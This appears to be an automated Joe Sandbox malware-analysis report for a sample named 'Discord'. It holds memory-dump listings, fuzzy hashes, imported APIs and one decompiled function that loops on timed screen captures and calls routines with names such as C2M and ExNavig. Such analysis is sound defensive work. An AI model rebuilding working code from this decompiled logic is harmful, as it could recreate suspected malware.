Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ada347751e7e2c06fda37306ea69bf0798c3f6a80c2dd5cbbd2118fe39391bc4
Instruction ID: aa8062c5e5b72958c01d668a7f5e7ce2b96afe86199790199ec923110a4c350c
Opcode Fuzzy Hash: ada347751e7e2c06fda37306ea69bf0798c3f6a80c2dd5cbbd2118fe39391bc4
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6DE98680 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8af6b0663a45e4f62edd484eba1e21fca5e0f9e1c90fa86d7b227f7a1db4963
Instruction ID: 4b2f5d984a9070474e109b0ff04b9705ebedf8b219bd8346a373d1c3dbd95f7d
Opcode Fuzzy Hash: b8af6b0663a45e4f62edd484eba1e21fca5e0f9e1c90fa86d7b227f7a1db4963
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94CA0 Relevance: .0, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16e1968e6d383d447f008456313cef55731ee24b1ccaf2215920c3810e1aac9f
Instruction ID: b033209f5ae2af55098a0924fd023c18d8a0854aed2ec06c0ee1f6a096c8ea51
Opcode Fuzzy Hash: 16e1968e6d383d447f008456313cef55731ee24b1ccaf2215920c3810e1aac9f
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94C30 Relevance: .0, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16e1968e6d383d447f008456313cef55731ee24b1ccaf2215920c3810e1aac9f
Instruction ID: b033209f5ae2af55098a0924fd023c18d8a0854aed2ec06c0ee1f6a096c8ea51
Opcode Fuzzy Hash: 16e1968e6d383d447f008456313cef55731ee24b1ccaf2215920c3810e1aac9f
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6DE88D07 Relevance: 94.9, APIs: 50, Strings: 4, Instructions: 381sleepCOMMON

Download Yara Rule

APIs

_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE88D31
Sleep.KERNEL32 ref: 6DE88D58
_Z10FichConfigv.DPUB1 ref: 6DE88D5D
_Z6ConfffRSsRSt6vectorISsSaISsEE.DFO1 ref: 6DE88D75
_Z6Incillv.DPUB1 ref: 6DE88D89
_Z7Incill1v.DPUB1 ref: 6DE88D9A
_ZN9__gnu_cxx6__stoaIlicIiEEET0_PFT_PKT1_PPS3_DpT2_EPKcS5_PjS9_.DPUB1 ref: 6DE88DD5
_ZN9__gnu_cxx6__stoaIlicIiEEET0_PFT_PKT1_PPS3_DpT2_EPKcS5_PjS9_.DPUB1 ref: 6DE88E0A
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88E24
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88E3C
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88E54
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88E6C
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88E84
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88E9C
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88EB4
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88ECC
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88EE4
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88EFC
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88F14
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88F2C
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88F44
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88F5C
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88F74
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88F8C
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88FA4
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88FBC
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88FD4
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88FEC
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE89004
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE8901C
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE89034
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE8904C

Strings

m, xrefs: 6DE89029
m, xrefs: 6DE89041
m, xrefs: 6DE89071
m, xrefs: 6DE89059

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Ss6assign$IlicN9__gnu_cxx6__stoa$ConfffConfigvFichIncill1vIncillvM_destroyRep10_SleepSs4_St6vector
String ID: m$m$m$m
API String ID: 4044844210-3441661251
Opcode ID: 6621edc40a707a021678ce050d715ecc2a89b0e49ca6692235cf2b9d1b56dee1
Instruction ID: 534ed2af115734b60ca8622247a4e4f4069727a677b7e9f816f080c8ce034397
Opcode Fuzzy Hash: 6621edc40a707a021678ce050d715ecc2a89b0e49ca6692235cf2b9d1b56dee1
Instruction Fuzzy Hash: 34F10FF29076009FDB00AFA8D44925D7BF0BB82614F55492ED655EF385EF349885CB83

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8D7E0 Relevance: 91.2, APIs: 39, Strings: 13, Instructions: 216
sleepCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E6DE8D7E0() {
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v45;
				intOrPtr _v64;
				intOrPtr _v108;
				long* _v112;
				long* _v116;
				intOrPtr* _v120;
				intOrPtr* _v124;
				intOrPtr* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char _v160;
				char _v164;
				void* _t73;
				char* _t77;
				signed int _t81;
				signed int _t83;
				void* _t85;
				signed int _t94;
				char* _t107;
				void* _t118;
				void* _t144;
				void* _t146;
				void* _t147;
				void* _t148;
				intOrPtr* _t152;
				intOrPtr* _t154;
				void* _t155;
				long long _t169;

				_v140 = 0x6de9eaac;
				L6DE8DD58();
				_v108 = 0x6de9e820;
				_v112 = 0x6de9e818;
				_v116 = 0x6de9e81c;
				_v120 = 0x6de9e824;
				_v124 = 0x6de9e828;
				_v128 = 0x6de9e82c;
				_v132 = 0x6de9e844;
				_v136 = 0x6de9e848;
				_v140 = 0x6de9e84c;
				_v144 =  &_v32;
				L6DE8DCF0();
				_t118 = _v32 - 0xc;
				_v144 =  &_v36;
				L6DE8DD48();
				_t146 = Sleep;
				Sleep( *0x6de9e818);
				_t152 = _t148 - 0x70;
				L6DE8DC80();
				goto L2;
				while(1) {
					L4:
					E6DE88BC0(_t77, _t169);
					if( *0x6de9e640 == 0) {
						goto L18;
					}
					L5:
					_t83 = rand();
					_t112 =  *0x6de9e580;
					asm("cdq");
					_t85 = E6DE85DC0(_t83 % ( *0x6de9e584 -  *0x6de9e580) + _t112, 0);
					_v148 = "rien";
					L6DE8DD68();
					_t155 = _t154 - 4;
					if(_t85 != 0) {
						L8:
						SetEvent( *0x6de9e8bc);
						_t154 = _t155 - 4;
						E6DE8C400();
						if( *0x6de9e814 != 0 ||  *0x6de9e868 == 0 || E6DE85DC0( *0x6de9e824, 1) == 0) {
							__eflags =  *0x6de9e760 - 1;
							if( *0x6de9e760 == 1) {
								E6DE8A200();
							}
						} else {
							if( *0x6de9e814 == 0) {
								E6DE8AA00();
								E6DE8ABF0(_t169);
								E6DE8CB80(_t169);
								if( *0x6de9e760 == 1) {
									E6DE8A200();
								}
								_v152 = 0x6de9e6e4;
								_v148 =  &_v45;
								L6DE8DDC8();
								_v160 = 0x6de9e89c;
								L6DE8DD58();
								_t154 = _t154 - 4;
								_v116 = 0x6de9e738;
								_v120 = 0x6de9e740;
								_v156 =  &_v32;
								_v124 = 0x6de9e748;
								_v128 = 0x6de9e74c;
								_v132 = 0x6de9e750;
								_v160 =  &_v36;
								_v136 = 0x6de9e754;
								_v140 = 0x6de9e758;
								_v144 = 0x6de9e7c0;
								_v148 = 0x6de9e7cc;
								_v152 =  *0x6de9e64c;
								_v164 =  *0x6de9e814;
								L6DE8DCF8();
								asm("lock xadd [eax-0x4], edx");
								if(0xffffffff <= 0) {
									_v164 =  &_v40;
									L6DE8DD30();
									_t154 = _t154 - 4;
								}
								asm("lock xadd [eax-0x4], edx");
								if(0xffffffff <= 0) {
									 *_t154 =  &_v36;
									L6DE8DD30();
									_t154 = _t154 - 4;
								}
							}
							E6DE85670(_t169);
							_t94 = rand();
							_t113 =  *0x6de9e828;
							asm("cdq");
							_t77 = E6DE85DC0(_t94 % ( *0x6de9e82c -  *0x6de9e828) + _t113, 0);
							while(1) {
								L4:
								E6DE88BC0(_t77, _t169);
								if( *0x6de9e640 == 0) {
									goto L18;
								}
								goto L5;
							}
						}
						goto L18;
					}
					_t107 =  &_v36;
					_v152 = "forcer";
					_v148 = _t107;
					L6DE8DDC8();
					_t154 = _t155 - 8;
					_v140 = 0x6de9e75c;
					_v144 = 0x6de9e838;
					_v148 = 0x6de9e83c;
					_v152 = 0x6de9e840;
					_v156 = 0x6de9e858;
					_v160 =  &_v40;
					L6DE8DC98();
					asm("lock xadd [ecx-0x4], edx");
					if(0xffffffff <= 0) {
						_v64 = _t107;
						_v160 =  &_v32;
						L6DE8DD30();
						_t107 = _v64;
						_t154 = _t154 - 4;
					}
					if(_t107 != 0) {
						goto L8;
					}
					L18:
					Sleep( *0x6de9e81c);
					_t154 = _t154 - 4;
					L6DE8DC80();
					E6DE85670(_t169);
					_t81 = rand();
					_t120 =  *0x6de9e828;
					asm("cdq");
					_t77 = E6DE85DC0(_t81 % ( *0x6de9e82c -  *0x6de9e828) + _t120, 0);
				}
				L2:
				_t73 = E6DE85D50();
				_t157 = _t73;
				if(_t73 == 0) {
					Sleep( *0x6de9e818);
					_t152 = _t152 - 4;
					goto L2;
				} else {
					L6DE8DC80();
					_v144 = 0x6de9e808;
					_v148 = 0x6de9e834;
					L6DE8DCC8();
					Sleep(0x3e8);
					E6DE88140(_t118, _t144, _t146, _t147, _t169);
					srand( *0x6de9e8d8);
					_v148 = E6DE8A910;
					_t77 = E6DE94DF0( *0x6de9e8d8,  &_v44, _t157);
					_t154 = _t152;
					goto L4;
				}
			}

0x6de8d7ec
0x6de8d7f3
0x6de8d7fe
0x6de8d806
0x6de8d80e
0x6de8d816
0x6de8d81e
0x6de8d826
0x6de8d82e
0x6de8d836
0x6de8d83e
0x6de8d846
0x6de8d849
0x6de8d851
0x6de8d857
0x6de8d85a
0x6de8d867
0x6de8d870
0x6de8d872
0x6de8d875
0x6de8d87a
0x6de8d8e1
0x6de8d8e1
0x6de8d8e1
0x6de8d8ee
0x00000000
0x00000000
0x6de8d8f4
0x6de8d8f4
0x6de8d8f9
0x6de8d905
0x6de8d917
0x6de8d91c
0x6de8d928
0x6de8d92d
0x6de8d932
0x6de8d99c
0x6de8d9a4
0x6de8d9a6
0x6de8d9a9
0x6de8d9b6
0x6de8db04
0x6de8db0b
0x6de8db0d
0x6de8db0d
0x6de8d9e7
0x6de8d9ee
0x6de8d9f4
0x6de8d9f9
0x6de8d9fe
0x6de8da0a
0x6de8db80
0x6de8db80
0x6de8da16
0x6de8da23
0x6de8da27
0x6de8da32
0x6de8da39
0x6de8da41
0x6de8da44
0x6de8da4c
0x6de8da54
0x6de8da5b
0x6de8da63
0x6de8da6b
0x6de8da73
0x6de8da7c
0x6de8da84
0x6de8da8c
0x6de8da94
0x6de8da9c
0x6de8daa0
0x6de8daa3
0x6de8dab0
0x6de8dab7
0x6de8db90
0x6de8db93
0x6de8db98
0x6de8db98
0x6de8dac5
0x6de8dacc
0x6de8dba6
0x6de8dba9
0x6de8dbae
0x6de8dbae
0x6de8dacc
0x6de8dad2
0x6de8dad7
0x6de8dadc
0x6de8dae8
0x6de8dafa
0x6de8d8e1
0x6de8d8e1
0x6de8d8e1
0x6de8d8ee
0x00000000
0x00000000
0x00000000
0x6de8d8ee
0x6de8d8e1
0x00000000
0x6de8d9b6
0x6de8d937
0x6de8d93a
0x6de8d941
0x6de8d947
0x6de8d94c
0x6de8d94f
0x6de8d957
0x6de8d95f
0x6de8d967
0x6de8d96f
0x6de8d977
0x6de8d97a
0x6de8d987
0x6de8d98e
0x6de8db60
0x6de8db69
0x6de8db6c
0x6de8db71
0x6de8db74
0x6de8db74
0x6de8d996
0x00000000
0x00000000
0x6de8db12
0x6de8db1a
0x6de8db1c
0x6de8db1f
0x6de8db24
0x6de8db29
0x6de8db2e
0x6de8db3a
0x6de8db4c
0x6de8db4c
0x6de8d889
0x6de8d889
0x6de8d88e
0x6de8d890
0x6de8d884
0x6de8d886
0x00000000
0x6de8d892
0x6de8d892
0x6de8d897
0x6de8d89f
0x6de8d8a6
0x6de8d8b2
0x6de8d8b7
0x6de8d8c4
0x6de8d8cc
0x6de8d8d3
0x6de8d8de
0x00000000
0x6de8d8de

APIs

_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE8D7F3
_Z5ConfeSsRSsS_S_RiS0_S0_S0_S0_S0_.DFO1 ref: 6DE8D849
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8D85A
Sleep.KERNEL32 ref: 6DE8D870
_Z12ImprimeEcranv.DFO1 ref: 6DE8D875
Sleep.KERNEL32 ref: 6DE8D884
_Z10FichConfigv.DPUB1 ref: 6DE8D889

Part of subcall function 6DE85D50: _Z12ImprimeEcranv.DFO1 ref: 6DE85D53
Part of subcall function 6DE85D50: strstr.MSVCRT ref: 6DE85D68
Part of subcall function 6DE85D50: _ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE85D7D
Part of subcall function 6DE85D50: strstr.MSVCRT ref: 6DE85D95

_Z12ImprimeEcranv.DFO1 ref: 6DE8D892
_Z6ConfffRSsRSt6vectorISsSaISsEE.DFO1 ref: 6DE8D8A6
Sleep.KERNEL32 ref: 6DE8D8B2
_Z5Lire0v.DPUB1 ref: 6DE8D8B7
srand.MSVCRT ref: 6DE8D8C4
_ZNSt6threadC1IRFivEIEEEOT_DpOT0_.DPUB1 ref: 6DE8D8D3
_Z24ConfigurationApplicationv.DPUB1 ref: 6DE8D8E1
rand.MSVCRT ref: 6DE8D8F4
_Z6VerDepii.DPUB1 ref: 6DE8D917
_ZNKSs7compareEPKc.LIBSTDC++-6 ref: 6DE8D928
_ZNSsC1EPKcRKSaIcE.LIBSTDC++-6 ref: 6DE8D947
_Z3C2MSsRSsS_S_S_Ri.DFO1 ref: 6DE8D97A
SetEvent.KERNEL32 ref: 6DE8D9A4
_Z7ExNavigv.DPUB1 ref: 6DE8D9A9
_Z6VerDepii.DPUB1 ref: 6DE8D9DA
_Z7AffNaviv.DPUB1 ref: 6DE8D9F4
_Z11ChercheDyDxv.DPUB1 ref: 6DE8D9F9
_Z4CPubv.DPUB1 ref: 6DE8D9FE
_ZNSsC1EPKcRKSaIcE.LIBSTDC++-6 ref: 6DE8DA27
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE8DA39
_Z4TErriSsSsiRSt6vectorISsSaISsEERS_IiSaIiEERiS6_S6_S6_S6_RyS6_.DFO1 ref: 6DE8DAA3
_Z6Incillv.DPUB1 ref: 6DE8DAD2
rand.MSVCRT ref: 6DE8DAD7
_Z6VerDepii.DPUB1 ref: 6DE8DAFA
Sleep.KERNEL32 ref: 6DE8DB1A
_Z12ImprimeEcranv.DFO1 ref: 6DE8DB1F
_Z6Incillv.DPUB1 ref: 6DE8DB24
rand.MSVCRT ref: 6DE8DB29
_Z6VerDepii.DPUB1 ref: 6DE8DB4C
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8DB93

Strings

8m, xrefs: 6DE8DA44
<m, xrefs: 6DE8D95F
@m, xrefs: 6DE8D923
Xm, xrefs: 6DE8DA84
@m, xrefs: 6DE8D967
Lm, xrefs: 6DE8DA63
\m, xrefs: 6DE8D94F
Tm, xrefs: 6DE8DA7C
Pm, xrefs: 6DE8DA6B
Hm, xrefs: 6DE8DA5B
8m, xrefs: 6DE8D957
@m, xrefs: 6DE8DA4C
Xm, xrefs: 6DE8D96F

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: DepiiEcranvImprimeSleep$rand$IncillvRep10_Ss4_St6vectorstrstr$ApplicationvChercheConfeConfffConfigurationConfigvErriEventFichLire0vM_destroyM_disposeNavigvNavivPubvSs6assignSs7compareSt6threadsrand
String ID: 8m$8m$<m$@m$@m$@m$Hm$Lm$Pm$Tm$Xm$Xm$\m
API String ID: 773227570-2919078621
Opcode ID: a1ba4b49cb4907639f3221b303ae9275a50c789be213f3682faf11eee1786907
Instruction ID: fdc26ed652be83fd692182fb9ebfd5b18b8493db48cb9bdbed51d78ce09cde14
Opcode Fuzzy Hash: a1ba4b49cb4907639f3221b303ae9275a50c789be213f3682faf11eee1786907
Instruction Fuzzy Hash: AC913DB490A7058FDB00EFA4C18A65EBBF0BF85718F25892ED6999B341EF349405CB53

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8C400 Relevance: 84.4, APIs: 47, Strings: 1, Instructions: 423COMMON

Download Yara Rule

APIs

_ZNSs9_M_mutateEjjj.LIBSTDC++-6 ref: 6DE8C452
rand.MSVCRT ref: 6DE8C45A
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE8C47E
ResetEvent.KERNEL32 ref: 6DE8C4EA

Strings

D, xrefs: 6DE8C4AB

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: EjjjEventM_mutateResetSs6assignSs9_rand
String ID: D
API String ID: 435159478-2746444292
Opcode ID: e9bf470a46ad89b9b4067da4dd9622fba25eda6d8b59cc57760d7a80f003437d
Instruction ID: 5dd2d3df4e4259d12e933a7f28c84f72e77784bf7f1a8c976297f5cc065901a2
Opcode Fuzzy Hash: e9bf470a46ad89b9b4067da4dd9622fba25eda6d8b59cc57760d7a80f003437d
Instruction Fuzzy Hash: BA126EB490A6058FDB10EF68C58875DBBF0FF85314F21866ED9989B381EB349549CF82

Uniqueness

Uniqueness Score: -1.00%

Function 6DE88140 Relevance: 79.0, APIs: 40, Strings: 5, Instructions: 272sleepCOMMON

Download Yara Rule

APIs

_Z6Incillv.DPUB1 ref: 6DE88143

Part of subcall function 6DE85670: ResetEvent.KERNEL32 ref: 6DE8567B
Part of subcall function 6DE85670: _ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE856B6
Part of subcall function 6DE85670: _ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE856DC
Part of subcall function 6DE85670: _ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE8570C
Part of subcall function 6DE85670: _ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85732
Part of subcall function 6DE85670: _ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85762
Part of subcall function 6DE85670: _ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85788
Part of subcall function 6DE85670: _ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE857A4
Part of subcall function 6DE85670: _ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE857C0
Part of subcall function 6DE85670: _ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE857DC
Part of subcall function 6DE85670: _ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE8582A
Part of subcall function 6DE85670: _ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85846

Sleep.KERNEL32 ref: 6DE8814F
GetDesktopWindow.USER32 ref: 6DE88158
GetWindowRect.USER32 ref: 6DE88169
_ZN9__gnu_cxx6__stoaIlicIiEEET0_PFT_PKT1_PPS3_DpT2_EPKcS5_PjS9_.DPUB1 ref: 6DE88220

Part of subcall function 6DE94A30: _errno.MSVCRT ref: 6DE94A45
Part of subcall function 6DE94A30: _errno.MSVCRT ref: 6DE94A6C

_ZN9__gnu_cxx6__stoaIlicIiEEET0_PFT_PKT1_PPS3_DpT2_EPKcS5_PjS9_.DPUB1 ref: 6DE88255
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE8826F
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88287
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE8829F
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE882B7
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE882CF
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE882E7
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE882FF
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88317
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE8832F
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88347
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE8835F
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88377
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE8838F
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE883A7
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE883BF
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE883D7
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE883EF
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88407
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE8841F
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88437
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE8844F
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88467
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE8847F
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88497
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE884AF
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE884C7
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE884DF
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE884F7
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE8850F
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88527
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE8853F
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE88559
_ZNKSs7compareEPKc.LIBSTDC++-6 ref: 6DE8856D
_ZNKSs7compareEPKc.LIBSTDC++-6 ref: 6DE885AC

Strings

|m, xrefs: 6DE8815E
m, xrefs: 6DE884A4
m, xrefs: 6DE8848C
m, xrefs: 6DE88474
m, xrefs: 6DE884BC

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
